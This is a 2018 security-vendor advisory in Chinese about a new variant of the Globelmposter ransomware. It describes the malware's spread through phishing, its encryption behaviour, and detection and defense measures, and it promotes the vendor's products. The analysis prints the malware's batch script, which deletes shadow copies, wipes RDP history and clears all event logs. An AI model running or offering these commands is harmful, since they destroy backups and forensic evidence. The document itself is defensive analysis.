“Globelmposter”勒索病毒再度肆虐,启明星辰提供解决方案
发布时间:2018-02-28   作者:启明星辰

近日,勒索病毒“Globelmposter”再度在国内传播肆虐,有传闻报道国内某机构受到攻击导致其业务中断。2017年年中,金睛安全研究团队就曾接到过客户针对该病毒的求助,此次流行的病毒为“Globelmposter”的新变种。该勒索病毒主要通过钓鱼邮件传播,用户点击附件中的脚本后,会自动下载相关勒索样本。勒索病毒运行后会将磁盘大部分文件加密,且无法还原。


技术分析

 

1.将自身拷贝到%APPDATA%目录下。

 

2.生成批处理文件,并执行。批处理文件如下:


vssadmin.exe Delete Shadows /All/Quiet

reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f

reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f

reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"

cd %userprofile%documents

attrib Default.rdp -s -h

del Default.rdp

for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

 

3.结束包含有如下关键字的进程:


sql,outlook,ssms,postgre,1c,excel,word

 

4.跳过以下目录不进行加密

 


5.使用RSA算法生成密钥,并进行全盘文件加密

 


6.文件被加密后,扩展名被篡改,文件内容被篡改且无法恢复。

 


7.加密后会留下勒索信息。

 

解决方案

 

1.检测手段:

 

1)在终端侧安装景云网络防病毒系统,可有效检测和清除“Globelmposter”勒索病毒及变种。

 

 

2)“Globelmposter”勒索病毒主要通过邮件途径传播。在网络侧部署天阗高级持续性威胁检测与管理系统,对邮件附件进行实时监测。其“动态行为检测”功能无需升级即可有效检测各类未知勒索病毒。

 

 

3)同时结合“VenusEye威胁情报中心”数据可查询到“Globelmposter”勒索病毒家族的相关情报。

 


2.防御手段:

 

1)重要资料要做到及时备份。

 

2)不点击来源不明的邮件以及附件,尤其是如下扩展名的附件:.js, .vbs, .exe, .scr, or .bat

 

3)及时更新操作系统以及各类应用的补丁(尤其是Java,Adobe Reader,Office,Flash等)

 

4)尽量关闭系统不需要的服务以及端口(445,139,135,3389等)。如果需要开启,则应设置好安全策略(如设置强密码,设置文件的执行策略等)

 

5)及时升级景云网络防病毒系统等专业的安全软件。


关于金睛安全研究团队


金睛安全研究团队是启明星辰集团检测产品本部从事专业安全分析的技术型团队,主要职责是对现有产品上报的安全事件、样本数据进行挖掘、分析,并向用户提供专业的分析报告。

 


关于VenusEye威胁情报中心

 

VenusEye威胁情报中心是由启明星辰倾力打造的集威胁情报收集、分析、处理、发布和应用为一体的威胁情报云服务平台,提供威胁情报数据、系统、技术和专业能力的输出。

 

文章来源:http://www.venustech.com.cn/
  • 公司总部 | 分支机构 | 法律声明 | 投资者关系 | 400-624-3900 800-810-6038
  • © 启明星辰1996-2018 版权所有 京ICP备05032414号 京公网安备11010802024551号